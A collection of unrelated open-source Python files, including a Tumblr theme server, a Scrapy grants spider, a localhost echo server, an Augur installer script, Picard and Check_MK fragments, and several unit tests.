                # -- always false -- and called an undefined DebugPrint.)
                section_map[option] = None
        return section_map

# getint(section, option)
# getboolean(section, option)

#!/usr/bin/env python3

import sys
import numpy as np
from spc import SPC
import matplotlib.pyplot as plt


def plot(files, fac=1.0):
    """Plot log-reciprocal intensity curves for .xy and .spc spectra files.

    ``fac`` scales the .xy curves only; .spc curves are plotted unscaled,
    matching the original behaviour.
    """
    for fname in files:
        extension = fname.rsplit('.', 1)[-1]
        if extension == 'xy':
            data = np.loadtxt(fname)
            plt.plot(data[:, 0], np.log(1. / data[:, 1]) * fac, label=fname)
        elif extension == 'spc':
            spectrum = SPC(fname)
            plt.plot(spectrum.xdata, np.log(1. / np.array(spectrum.ydata)), label=fname)
    plt.legend()
    plt.show()


if __name__ == '__main__':
    # Usage: script.py FACTOR FILE [FILE ...]
    # argv[1] is the scale factor applied to .xy data; the remaining
    # arguments are spectra file paths handed to plot().
    files = sys.argv[2:]
    fac = float(sys.argv[1])
    plot(files, fac)

#!/usr/bin/env python

##    tumblrserv.py implements a Tumblr (http://www.tumblr.com) markup parsing
##    engine and compatible webserver.
##
##    Version: 0.2 final
##
##    Copyright (C) 2009 Jeremy Herbert
##    Contact mailto:jeremy@jeremyherbert.net
##
##    This program is free software; you can redistribute it and/or
##    modify it under the terms of the GNU General Public License
##    as published by the Free Software Foundation; either version 2
##    of the License, or (at your option) any later version.
##    
##    This program is distributed in the hope that it will be useful,
##    but WITHOUT ANY WARRANTY; without even the implied warranty of
##    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
##    GNU General Public License for more details.
##    
##    You should have received a copy of the GNU General Public License
##    along with this program; if not, write to the Free Software
##    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 
##    02110-1301, USA.

import os, sys, ftplib, yaml, cherrypy, re, urllib2

from src.post_classes import *
from src import json
from src.constants import *
from src.support import *
from src.net import *
from src.server import *

# Names of the Tumblr post types supported by the markup engine.
# NOTE(review): 'Conversation' appears twice (positions 4 and 7); one entry is
# probably redundant or should be a different type -- confirm before relying
# on this list's length or indices.
post_types = ['Regular', 'Photo', 'Quote', 'Link', 'Conversation', 'Video', 'Audio', 'Conversation']

# Default runtime options; may be overridden by command-line flags below.
args_dict = {
    'autoreload': 0, # Whether to add the meta refresh tag
    'publish': False, # Whether to push the new theme data to tumblr
    'data_source': DATA_LOCAL, # Whether to use local data in the theme
}

########################################

# take the arguments and place them in a mutable list 
arguments = sys.argv

# if the script has been run with the interpreter prefix, get rid of it
if arguments[0] == 'python' or arguments[0] == 'ipython' \
or arguments[0] == 'python2.5': 
    arguments.pop(0)

# pop off the script name
arguments.pop(0)

# load the configuration file
# NOTE(review): contains()/next_arg()/err_exit()/get_config() presumably come
# from the star-imports of src.support / src.net above -- verify.
config_path = 'data/config.yml'
if contains(arguments, '--config'):
    if os.path.exists(next_arg(arguments, '--config')):
        config_path = next_arg(arguments, '--config')

config = get_config(config_path)

# now we check if there are any data processing flags
if contains(arguments, '--pull-data'):
    # call pull_data with the argument after the flag
    pull_data( next_arg(arguments, '--pull-data') )

# --theme overrides the configured theme, after checking the file exists
if contains(arguments, '--theme'):
    if not os.path.exists("themes/" + next_arg(arguments, '--theme') + '.thtml'):
        err_exit("The theme file %s.thtml does not exist in the themes\
 directory." % next_arg(arguments, '--theme'))
    config['defaults']['theme_name'] = next_arg(arguments, '--theme')

# --publish pushes the current theme to tumblr using the configured credentials
if contains(arguments, '--publish'):
    if not has_keys(config['publishing_info'], \
     ( 'url', 'username', 'password' )): 

        err_exit('The configuration file is missing some critical publishing\
 information. Please make sure you have specified your url, username and\
 password.')
 
    publish_theme(config['publishing_info']['url'],\
     config['publishing_info']['username'],\
     config['publishing_info']['password'],\
     get_markup('themes/%s.thtml' % config['defaults']['theme_name']))
    
if contains(arguments, '--do-nothing'):
    config['optimisations']['do_nothing'] = True
    
# start the server up
cherrypy.config.update('data/cherrypy.conf')
cherrypy.quickstart(TumblrServ(config), '/')
# ROME survey field pointings, keyed by field name.  Each value is
# [RA (decimal degrees), Dec (decimal degrees), RA (sexagesimal), Dec (sexagesimal)].
field_dict={'ROME-FIELD-01':[ 267.835895375 , -30.0608178195 , '17:51:20.6149','-30:03:38.9442' ],
            'ROME-FIELD-02':[ 269.636745458 , -27.9782661111 , '17:58:32.8189','-27:58:41.758' ],
            'ROME-FIELD-03':[ 268.000049542 , -28.8195573333 , '17:52:00.0119','-28:49:10.4064' ],
            'ROME-FIELD-04':[ 268.180171708 , -29.27851275 , '17:52:43.2412','-29:16:42.6459' ],
            'ROME-FIELD-05':[ 268.35435 , -30.2578356389 , '17:53:25.044','-30:15:28.2083' ],
            'ROME-FIELD-06':[ 268.356124833 , -29.7729819283 , '17:53:25.47','-29:46:22.7349' ],
            'ROME-FIELD-07':[ 268.529571333 , -28.6937071111 , '17:54:07.0971','-28:41:37.3456' ],
            'ROME-FIELD-08':[ 268.709737083 , -29.1867251944 , '17:54:50.3369','-29:11:12.2107' ],
            'ROME-FIELD-09':[ 268.881108542 , -29.7704673333 , '17:55:31.4661','-29:46:13.6824' ],
            'ROME-FIELD-10':[ 269.048498333 , -28.6440675 , '17:56:11.6396','-28:38:38.643' ],
            'ROME-FIELD-11':[ 269.23883225 , -29.2716684211 , '17:56:57.3197','-29:16:18.0063' ],
            'ROME-FIELD-12':[ 269.39478875 , -30.0992361667 , '17:57:34.7493','-30:05:57.2502' ],
            'ROME-FIELD-13':[ 269.563719375 , -28.4422328996 , '17:58:15.2927','-28:26:32.0384' ],
            'ROME-FIELD-14':[ 269.758843 , -29.1796030365 , '17:59:02.1223','-29:10:46.5709' ],
            'ROME-FIELD-15':[ 269.78359875 , -29.63940425 , '17:59:08.0637','-29:38:21.8553' ],
            'ROME-FIELD-16':[ 270.074981708 , -28.5375585833 , '18:00:17.9956','-28:32:15.2109' ],
            'ROME-FIELD-17':[ 270.81 , -28.0978333333 , '18:03:14.4','-28:05:52.2' ],
            'ROME-FIELD-18':[ 270.290886667 , -27.9986032778 , '18:01:09.8128','-27:59:54.9718' ],
            'ROME-FIELD-19':[ 270.312763708 , -29.0084241944 , '18:01:15.0633','-29:00:30.3271' ],
            'ROME-FIELD-20':[ 270.83674125 , -28.8431573889 , '18:03:20.8179','-28:50:35.3666' ]}

# -*- coding: utf-8 -*-
from scrapy.spider import Spider
from scrapy.selector import Selector
from kgrants.items import KgrantsItem
from scrapy.http import Request
import time



class GrantsSpider(Spider):
    """Scrape grant listings from knightfoundation.org.

    Crawls the paginated grants index, then follows each project page and
    fills a KgrantsItem with the grant's details.  (Python 2 codebase:
    uses xrange.)
    """

    name = "grants"
    allowed_domains = ["www.knightfoundation.org"]
    pages = 1  # number of index pages to crawl
    base_url = 'http://www.knightfoundation.org'
    start_url_str = 'http://www.knightfoundation.org/grants/?sort=title&page=%s'

    def __init__(self, pages=None, *args, **kwargs):
        """:param pages: how many index pages to crawl (string or int from CLI)."""
        super(GrantsSpider, self).__init__(*args, **kwargs)

        if pages is not None:
            self.pages = pages
            self.start_urls = [self.start_url_str % str(page) for page in xrange(1, int(self.pages) + 1)]

    def parse(self, response):
        """Yield one request per project article found on an index page."""
        hxs = Selector(response)
        projects = hxs.xpath('//article')

        for project in projects:
            time.sleep(2)  # crude rate limiting to be polite to the server
            project_url = self.base_url + ''.join(project.xpath('a/@href').extract())
            grants = KgrantsItem()
            grants['page'] = project_url
            grants['project'] = ''.join(project.xpath('a/div/header/h1/text()').extract()).strip()
            grants['description'] = ''.join(project.xpath('p/text()').extract()).strip()
            yield Request(grants['page'],
                          callback=self.parse_project,
                          meta={'grants': grants})

    def parse_project(self, response):
        """Fill in grant details from a project page and yield the item."""
        hxs = Selector(response)
        grants = response.meta['grants']
        details = hxs.xpath('//section[@id="grant_info"]')
        fields = hxs.xpath('//dt')
        values = hxs.xpath('//dd')
        self.log('field: <%s>' % fields.extract())

        for item in details:
            grants['fiscal_agent'] = ''.join(item.xpath('header/h2/text()').extract()).strip()
            count = 0
            # <dt>/<dd> pairs: dt holds the field name, dd (same index) the value.
            for field in fields:
                normalized_field = ''.join(field.xpath('text()').extract()).strip().lower().replace(' ','_')
                self.log('field: <%s>' % normalized_field)
                try:
                    grants[normalized_field] = values.xpath('text()').extract()[count]
                except (IndexError, KeyError):
                    # Narrowed from a bare `except`: IndexError when the <dd>
                    # has no direct text node at this position, KeyError when
                    # the field is not declared on KgrantsItem.  Two fields
                    # keep their values inside <a> tags instead.
                    if normalized_field == 'community':
                        grants[normalized_field] = values.xpath('a/text()').extract()[1]
                    elif normalized_field == 'focus_area':
                        grants[normalized_field] = values.xpath('a/text()').extract()[0]

                count += 1
            grants['grantee_contact_email'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/@href').extract()).replace('mailto:','').strip()
            grants['grantee_contact_name'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/text()').extract()).strip()
            grants['grantee_contact_location'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="location"]/text()').extract()).strip()
            grants['grantee_contact_facebook'] = ''.join(
                item.xpath('section[@id="grant_contact"]/ul/li[@class="facebook"]/a/@href').extract()).strip()
            grants['grantee_contact_twitter'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="twitter"]/a/@href').extract()
            grants['grantee_contact_website'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="website"]/a/@href').extract()
            if 'grant_period' in grants:
                # e.g. "2013-01-01 to 2014-01-01"
                grant_period = grants['grant_period'].split(' to ')
                grants['grant_period_start'] = grant_period[0]
                grants['grant_period_end'] = grant_period[1]

            yield grants


from sys import argv

# Unpack the CLI: argv[0] is the script name, argv[1] the file to read.
script, input_file = argv

def print_all(f):
    """Print the entire remaining contents of file object *f* (Python 2)."""
    print f.read()

def rewind(f):
    """Reset *f*'s read position back to the start of the file."""
    f.seek(0, 0)

def print_a_line(line_count, f):
    """Print *line_count* followed by the next line read from *f* (Python 2)."""
    print line_count, f.readline()

# NOTE(review): the file is opened read-only and never closed -- acceptable
# for this demo script, but a `with` block would be cleaner.
current_file = open(input_file)

print "First let's print the whole file:\n"

print_all(current_file)

print "Now let's rewind, kind of like a tape."

rewind(current_file)

print "Let's print three lines:"

# Read the first three lines one at a time, numbering them manually.
current_line = 1
print_a_line(current_line, current_file)

current_line = current_line + 1
print_a_line(current_line, current_file)

current_line = current_line + 1
print_a_line(current_line, current_file)



# -*- coding: UTF-8 -*-
#/*
# *      Copyright (C) 2011 Ivo Brhel
# *
# *
# *  This Program is free software; you can redistribute it and/or modify
# *  it under the terms of the GNU General Public License as published by
# *  the Free Software Foundation; either version 2, or (at your option)
# *  any later version.
# *
# *  This Program is distributed in the hope that it will be useful,
# *  but WITHOUT ANY WARRANTY; without even the implied warranty of
# *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# *  GNU General Public License for more details.
# *
# *  You should have received a copy of the GNU General Public License
# *  along with this program; see the file COPYING.  If not, write to
# *  the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# *  http://www.gnu.org/copyleft/gpl.html
# *
# */

import re,os,urllib,urllib2,cookielib
import util,resolver

from provider import ContentProvider

class HejbejseContentProvider(ContentProvider):
	"""Content provider scraping show listings from kynychova-tv.cz (hejbejse.tv)."""
	
	def __init__(self,username=None,password=None,filter=None):
		ContentProvider.__init__(self,'hejbejse.tv','http://www.kynychova-tv.cz/',username,password,filter)
		# Install a cookie-aware opener so subsequent urllib2 requests share
		# any session cookies set by the site.
		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
		urllib2.install_opener(opener)

	def capabilities(self):
		"""Return the operations this provider supports."""
		return ['resolve','categories','list']
		
	def categories(self):
		"""Scrape show categories from the site's index page.

		:returns: list of dir items, each with 'title' and 'url'.
		"""
		page = util.parse_html('http://www.kynychova-tv.cz/index.php?id=5')
		result = []
		for title,uri in [(x.h3.text,x.h3.a['href']) for x in page.select('div.entry5') if x.h3]:
			item = self.dir_item()
			item['title'] = title
			item['url'] = uri
			result.append(item)
		return result

	def list(self, url):
		"""List video items found on a category page.

		:param url: category URL (may be relative; resolved via self._url).
		:returns: list of video items, each with 'title' and 'url'.
		"""
		url = self._url(url)
		page = util.parse_html(url)
		result = []
		for title,uri in [(x.img['title'],x['href']) for x in page.select('div.entry3')[0].findAll('a')]:
			item = self.video_item()
			item['title'] = title
			item['url'] = uri
			result.append(item)
		return result
	
	def resolve(self,item,captcha_cb=None,select_cb=None):
		"""Resolve a video item to playable stream(s).

		Extracts embedded <iframe> players from the page and hands them to
		the shared resolver.  Returns a single item when exactly one stream
		resolves, select_cb(result) when several do, and None otherwise.
		"""
		item = item.copy()
		url = self._url(item['url'])
		page = util.parse_html(url)
		result = []
		data=str(page.select('div.entry3 > center')[0])
		resolved = resolver.findstreams(data,['<iframe(.+?)src=[\"\'](?P<url>.+?)[\'\"]'])
		try:
			for i in resolved:
				item = self.video_item()
				item['title'] = i['name']
				item['url'] = i['url']
				item['quality'] = i['quality']
				item['surl'] = i['surl']
				result.append(item)	 
		except:
			# Best-effort: an unexpected resolver result shape is logged, not fatal.
			print '===Unknown resolver==='
			
		if len(result)==1:
			return result[0]
		elif len(result) > 1 and select_cb:
			return select_cb(result)

import socket
import threading
import time

def tcplink(sock, addr):
    """Serve one client connection (runs in its own thread, Python 2).

    Sends a greeting, then echoes 'Hello, <data>!' for each message until
    the client sends 'exit' or closes the connection.

    :param sock: connected socket object.
    :param addr: (host, port) tuple of the peer.
    """
    print 'Accept new connection from %s:%s...' % addr
    sock.send('Welcome!')
    while True:
        data = sock.recv(1024)
        time.sleep(1)
        # Empty data means the peer closed the connection.
        if data == 'exit' or not data:
            break
        sock.send('Hello, %s!' % data)
    sock.close()
    print 'Connection from %s:%s closed.' % addr


# TCP echo server: listen on localhost:8888 and spawn one thread per client.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 8888))
s.listen(5)
print 'Waiting for connection...'
while True:
    # accept() blocks until a client connects.
    sock, addr = s.accept()
    t = threading.Thread(target=tcplink, args=(sock, addr))
    t.start()



import os
import sys
import shutil
import binascii
import traceback
import subprocess
from win32com.client import Dispatch

# Installation target for the launcher binaries.
LAUNCHER_PATH = "C:\\Program Files\\Augur"
# Per-user application data directory (AppData\Roaming\Augur).
DATA_PATH = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', "Augur")
# The generated geth account password is stored here.
PASSFILE = os.path.join(DATA_PATH, "password.txt")

if getattr(sys, 'frozen', False):
    # we are running in a |PyInstaller| bundle
    BASEDIR = sys._MEIPASS
else:
    # we are running in a normal Python environment
    BASEDIR = os.path.dirname(os.path.abspath(__file__))

# Executables shipped next to this installer, copied into LAUNCHER_PATH.
GETH_EXE = os.path.join(BASEDIR, 'geth.exe')
LAUNCHER_EXE = os.path.join(BASEDIR, 'augurlauncher.exe')

def main():
    """Install Augur: create directories, generate a node password, copy the
    bundled executables, create a geth account and a desktop shortcut.

    Raises OSError if the target directories already exist (a previous
    install must be removed with `uninstall` first).
    """
    # first make all the appropriate directories
    print("Making directories...")
    for d in LAUNCHER_PATH, DATA_PATH:
        print("Creating", d, end=" ", flush=True)
        os.mkdir(d)  # intentionally fails if the directory already exists
        print("Success!")

    print("Generating random password file...", end=" ", flush=True)
    # 32 random bytes, hex-encoded -> 64 ASCII characters.
    password = binascii.b2a_hex(os.urandom(32))
    # Use a context manager so the file is closed even if the write fails.
    with open(PASSFILE, "w") as passfile:
        passfile.write(password.decode('ascii'))
    print("Success!")

    # Then copy ".exe"s to the launcher path
    exes = GETH_EXE, LAUNCHER_EXE
    results = []
    for exe in exes:
        print("Copying", os.path.basename(exe), "to", LAUNCHER_PATH, "...", end=" ", flush=True)
        results.append(shutil.copy(exe, LAUNCHER_PATH))
        print("Success!")  # fixed message typo ("Sucess!")

    print("Creating node account...", end=" ", flush=True)
    # create account on node; geth reads the new account's password from PASSFILE
    p = subprocess.Popen([results[0],
                      "--password", PASSFILE,
                      "account", "new"])
    p.wait()
    print("Success!")

    print("Creating shortcut...", end=" ", flush=True)
    desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
    shortcut_path = os.path.join(desktop, "Augur Launcher.lnk")
    wDir = LAUNCHER_PATH

    # Windows Script Host COM object creates the .lnk shortcut.
    shell = Dispatch('WScript.Shell')
    shortcut = shell.CreateShortCut(shortcut_path)
    shortcut.Targetpath = results[1]  # the copied launcher exe
    shortcut.WorkingDirectory = wDir
    shortcut.IconLocation = results[1]
    shortcut.save()
    print("Success!")

def uninstall():
    """Remove the Augur install and data directories plus the desktop shortcut."""
    for target in (LAUNCHER_PATH, DATA_PATH):
        print("Deleting", target, "...", end=" ", flush=True)
        shutil.rmtree(target)
        print("Success!")
    print("Removing desktop shortcut...", end=" ", flush=True)
    link = os.path.join(os.path.expanduser('~'), 'Desktop', "Augur Launcher.lnk")
    os.remove(link)
    print("Success!")

if __name__ == '__main__':
    # CLI: no arguments -> install; single 'uninstall' argument -> uninstall.
    try:
        if len(sys.argv) == 2 and sys.argv[1] == 'uninstall':
            uninstall()
        elif len(sys.argv) == 1:
            main()
        else:
            # Don't use `assert` for argument validation: it is stripped
            # under -O, and the original condition silently did nothing for
            # a wrong single argument.  Raise so the error is reported by
            # traceback.print_exc() below.
            raise ValueError("wrong number of arguments!")
    except Exception:
        traceback.print_exc()
    finally:
        os.system("pause")  # keep the console window open on Windows
        sys.exit(0)

import unittest
from libs.funcs import *

class TestFuncs(unittest.TestCase):
    """Sanity checks for the libs.funcs path/metadata helpers (Python 2 codebase)."""

    def test_buildPaths(self):
        """buildPaths() should place records/reports/routines in the expected layers."""
        recPaths, repPaths, rouPaths, corePaths = buildPaths()
        # Substring-containment helper for path assertions.
        findTxt = lambda x, y: x.find(y) > -1

        assert findTxt(recPaths["Task"][0], "base")
        assert findTxt(recPaths["Department"][0], "StdPy")
        assert findTxt(recPaths["Department"][1], "standard")

        assert findTxt(repPaths["ListWindowReport"][0], "base")
        assert findTxt(repPaths["ExpensesList"][0], "StdPy")
        assert findTxt(repPaths["ExpensesList"][1], "standard")

        assert findTxt(rouPaths["GenNLT"][0], "StdPy")
        assert findTxt(rouPaths["GenNLT"][1], "standard")
        assert findTxt(corePaths["Field"][0], "embedded")

        self.assertFalse([k for (k, v) in rouPaths.iteritems() if findTxt(v[0], "base")]) #no routines in base

    def test_recordInheritance(self):
        """getRecordInheritance() should merge fields/details from all ancestors."""
        recf, recd = getRecordInheritance("Invoice")
        assert all([f1 in recf for f1 in ("SalesMan", "InvoiceDate", "CustCode", "Currency", "ShiftDate", "OriginNr", "SerNr", "attachFlag")])
        assert all([d in recd for d in ("CompoundItemCosts", "Payments", "Items", "Taxes", "Installs")])

        recf, recd = getRecordInheritance("AccessGroup")
        assert all([f2 in recf for f2 in ("PurchaseItemsAccessType", "InitialModule", "Closed", "internalId")])
        assert all([d in recd for d in ("PurchaseItems", "Customs", "Modules")])

    def test_recordsInfo(self):
        """getRecordsInfo() should report field types and detail record names per layer."""
        recf, recd = getRecordsInfo("Department", RECORD)
        assert recf["Department"]["AutoCashCancel"] == "integer" #From StdPy
        assert recf["Department"]["DeptName"]       == "string" #From standard
        assert recf["Department"]["Closed"]         == "Boolean" #From Master
        assert recf["Department"]["internalId"]     == "internalid" #From Record
        assert recd["Department"]["OfficePayModes"] == "DepartmentOfficePayModeRow" #Recordname from detail

        repf, repd = getRecordsInfo("Balance", REPORT)
        assert repf["Balance"]["LabelType"]         == "string" #StdPy
        assert repf["Balance"]["ExplodeByLabel"]    == "boolean" #Standard
        assert repf["Balance"]["internalId"]        == "internalid" #Record
        assert not repd["Balance"] #Empty dict, no detail

        rouf, roud = getRecordsInfo("GenNLT", ROUTINE)
        assert rouf["GenNLT"]["ExcludeInvalid"]     == "boolean"
        assert rouf["GenNLT"]["Table"]              == "string"
        assert not roud["GenNLT"]

        rouf, roud = getRecordsInfo("LoginDialog", RECORD)
        assert rouf["LoginDialog"]["Password"]      == "string" #embedded
        assert not roud["LoginDialog"]

    def test_classInfo(self):
        """getClassInfo() should expose class attributes and method signatures."""
        attr, meth = getClassInfo("Invoice")
        assert attr["DEBITNOTE"]     == 2
        assert attr["ATTACH_NOTE"]   == 3
        assert attr["rowNr"]         == 0
        assert attr["ParentInvoice"] == "SuperClass"
        assert isinstance(attr["DocTypes"], list)
        assert isinstance(attr["Origin"], dict)
        assert all([m in meth for m in ("getCardReader", "logTransactionAction", "updateCredLimit",
            "generateTaxes", "roundValue", "getOriginType", "bring", "getXML", "createField")])
        # Method signature entries: positional names, then {name: default} dicts.
        assert meth["fieldIsEditable"][0] == "self"
        assert meth["fieldIsEditable"][1] == "fieldname"
        assert meth["fieldIsEditable"][2] == {"rowfieldname":'None'}
        assert meth["fieldIsEditable"][3] == {"rownr":'None'}

        attr, meth = getClassInfo("User")
        assert attr["buffer"] == "RecordBuffer"
        assert all([m in meth for m in ("store", "save", "load", "hasField")])

def test_suite():
    """Assemble this module's tests into a single unittest suite."""
    return unittest.TestSuite([unittest.makeSuite(TestFuncs)])

if __name__ == '__main__':
    # Run the explicitly assembled suite instead of auto-discovery.
    unittest.main(defaultTest='test_suite')

# -*- coding: utf-8 -*-


def outfit():
    """Return a payload dict holding five placeholder item names."""
    items = ["Item{}".format(index) for index in range(5)]
    return {"data": items}


# Route table of (path, endpoint name, handler) triples.
# NOTE(review): presumably consumed by the web framework's registration code
# defined elsewhere -- verify against the importer.
api = [
    ('/outfit', 'outfit', outfit),
]

import os
import unittest
import tempfile
from git import Repo
from oeqa.utils.commands import get_bb_var
from oe.buildhistory_analysis import blob_to_dict, compare_dict_blobs

class TestBlobParsing(unittest.TestCase):
    """Tests for buildhistory git-blob parsing and comparison helpers."""

    def setUp(self):
        import time
        # Scratch git repository under TOPDIR; removed again in tearDown().
        self.repo_path = tempfile.mkdtemp(prefix='selftest-buildhistory',
            dir=get_bb_var('TOPDIR'))

        self.repo = Repo.init(self.repo_path)
        self.test_file = "test"
        # Mirrors the variable assignments currently committed to the repo.
        self.var_map = {}

    def tearDown(self):
        import shutil
        shutil.rmtree(self.repo_path)

    def commit_vars(self, to_add=None, to_remove=None, msg="A commit message"):
        """Apply variable additions/removals to the test file and commit.

        :param to_add: mapping of variable name -> value to set.
        :param to_remove: iterable of variable names to delete.
        :param msg: commit message to use.
        """
        # Avoid mutable default arguments (previously {} and []).
        to_add = to_add if to_add is not None else {}
        to_remove = to_remove if to_remove is not None else []
        if len(to_add) == 0 and len(to_remove) == 0:
            return

        for k in to_remove:
            # Fixed: this previously popped the undefined name `x`, raising
            # NameError whenever to_remove was non-empty.
            self.var_map.pop(k, None)
        for k in to_add:
            self.var_map[k] = to_add[k]

        with open(os.path.join(self.repo_path, self.test_file), 'w') as repo_file:
            for k in self.var_map:
                repo_file.write("%s = %s\n" % (k, self.var_map[k]))

        self.repo.git.add("--all")
        self.repo.git.commit(message=msg)

    def test_blob_to_dict(self):
        """
        Test conversion of git blobs to dictionary
        """
        valuesmap = { "foo" : "1", "bar" : "2" }
        self.commit_vars(to_add = valuesmap)

        blob = self.repo.head.commit.tree.blobs[0]
        self.assertEqual(valuesmap, blob_to_dict(blob),
            "commit was not translated correctly to dictionary")

    def test_compare_dict_blobs(self):
        """
        Test comparison of dictionaries extracted from git blobs
        """
        changesmap = { "foo-2" : ("2", "8"), "bar" : ("","4"), "bar-2" : ("","5")}

        self.commit_vars(to_add = { "foo" : "1", "foo-2" : "2", "foo-3" : "3" })
        blob1 = self.repo.heads.master.commit.tree.blobs[0]

        self.commit_vars(to_add = { "foo-2" : "8", "bar" : "4", "bar-2" : "5" })
        blob2 = self.repo.heads.master.commit.tree.blobs[0]

        change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
            blob1, blob2, False, False)

        var_changes = { x.fieldname : (x.oldvalue, x.newvalue) for x in change_records}
        self.assertEqual(changesmap, var_changes, "Changes not reported correctly")

    def test_compare_dict_blobs_default(self):
        """
        Test default values for comparison of git blob dictionaries
        """
        defaultmap = { x : ("default", "1")  for x in ["PKG", "PKGE", "PKGV", "PKGR"]}

        self.commit_vars(to_add = { "foo" : "1" })
        blob1 = self.repo.heads.master.commit.tree.blobs[0]

        self.commit_vars(to_add = { "PKG" : "1", "PKGE" : "1", "PKGV" : "1", "PKGR" : "1" })
        blob2 = self.repo.heads.master.commit.tree.blobs[0]

        change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
            blob1, blob2, False, False)

        var_changes = {}
        for x in change_records:
            oldvalue = "default" if ("default" in x.oldvalue) else x.oldvalue
            var_changes[x.fieldname] = (oldvalue, x.newvalue)

        self.assertEqual(defaultmap, var_changes, "Defaults not set properly")

# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
# Copyright (C) 2006 Lukáš Lalinský
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

import re
from PyQt5 import QtWidgets
from picard import config
from picard.plugin import ExtensionPoint


class OptionsCheckError(Exception):
    """Raised when validating an options page fails.

    Carries a short *title* and a longer *info* message for display
    (see OptionsPage.display_error below).
    """

    def __init__(self, title, info):
        self.title = title
        self.info = info


class OptionsPage(QtWidgets.QWidget):
    """Base widget for Picard options pages.

    Subclasses override load()/save()/check() and define an ``options``
    attribute listing the config options the page manages.
    """

    PARENT = None
    SORT_ORDER = 1000
    ACTIVE = True
    STYLESHEET_ERROR = "QWidget { background-color: #f55; color: white; font-weight:bold }"
    STYLESHEET = "QLabel { qproperty-wordWrap: true; }"

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.setStyleSheet(self.STYLESHEET)

    def info(self):
        """Return page information; must be implemented by subclasses."""
        raise NotImplementedError

    def check(self):
        """Validate the page's widget state; raise OptionsCheckError on failure."""
        pass

    def load(self):
        """Populate the page's widgets from the configuration."""
        pass

    def save(self):
        """Persist the page's widget state back to the configuration."""
        pass

    def restore_defaults(self):
        """Reset this page's settings to their defaults in the UI only."""
        try:
            options = self.options
        except AttributeError:
            # Page declares no options; nothing to restore.
            return
        old_options = {}
        for option in options:
            if option.section == 'setting':
                old_options[option.name] = config.setting[option.name]
                config.setting[option.name] = option.default
        self.load()
        # Restore the config values in case the user doesn't save after
        # restoring defaults.
        for key in old_options:
            config.setting[key] = old_options[key]

    def display_error(self, error):
        """Show *error* (an OptionsCheckError) in a warning dialog."""
        dialog = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Warning, error.title, error.info, QtWidgets.QMessageBox.Ok, self)
        dialog.exec_()

    def init_regex_checker(self, regex_edit, regex_error):
        """
        regex_edit : a widget supporting text() and textChanged() methods, ie
        QLineEdit
        regex_error : a widget supporting setStyleSheet() and setText() methods,
        ie. QLabel
        """

        def check():
            try:
                re.compile(regex_edit.text())
            except re.error as e:
                # Fixed: `string_` was an undefined name here, so any invalid
                # regex raised NameError instead of the intended check error.
                raise OptionsCheckError(_("Regex Error"), str(e))

        def live_checker(text):
            regex_error.setStyleSheet("")
            regex_error.setText("")
            try:
                check()
            except OptionsCheckError as e:
                regex_error.setStyleSheet(self.STYLESHEET_ERROR)
                regex_error.setText(e.info)

        regex_edit.textChanged.connect(live_checker)


# Global registry of options pages, populated via register_options_page().
_pages = ExtensionPoint()


def register_options_page(page_class):
    """Register *page_class* in the options-page extension point, keyed by
    the module that defines it."""
    _pages.register(page_class.__module__, page_class)

#!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# |             ____ _               _        __  __ _  __           |
# |            / ___| |__   ___  ___| | __   |  \/  | |/ /           |
# |           | |   | '_ \ / _ \/ __| |/ /   | |\/| | ' /            |
# |           | |___| | | |  __/ (__|   <    | |  | | . \            |
# |            \____|_| |_|\___|\___|_|\_\___|_|  |_|_|\_\           |
# |                                                                  |
# | Copyright Mathias Kettner 2014             mk@mathias-kettner.de |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software;  you can redistribute it and/or modify it
# under the  terms of the  GNU General Public License  as published by
# the Free Software Foundation in version 2.  check_mk is  distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY;  with-
# out even the implied warranty of  MERCHANTABILITY  or  FITNESS FOR A
# PARTICULAR PURPOSE. See the  GNU General Public License for more de-
# ails.  You should have  received  a copy of the  GNU  General Public
# License along with GNU Make; see the file  COPYING.  If  not,  write
# to the Free Software Foundation, Inc., 51 Franklin St,  Fifth Floor,
# Boston, MA 02110-1301 USA.

import config
# Guard so load() runs its permission declarations only once per language;
# load() compares this against `current_language`.  NOTE(review):
# `current_language` is not defined in this module -- presumably injected by
# the Multisite plugin loader; verify.
loaded_with_language = False

#   .----------------------------------------------------------------------.
#   |        ____                     _         _                          |
#   |       |  _ \ ___ _ __ _ __ ___ (_)___ ___(_) ___  _ __  ___          |
#   |       | |_) / _ \ '__| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|         |
#   |       |  __/  __/ |  | | | | | | \__ \__ \ | (_) | | | \__ \         |
#   |       |_|   \___|_|  |_| |_| |_|_|___/___/_|\___/|_| |_|___/         |
#   |                                                                      |
#   +----------------------------------------------------------------------+
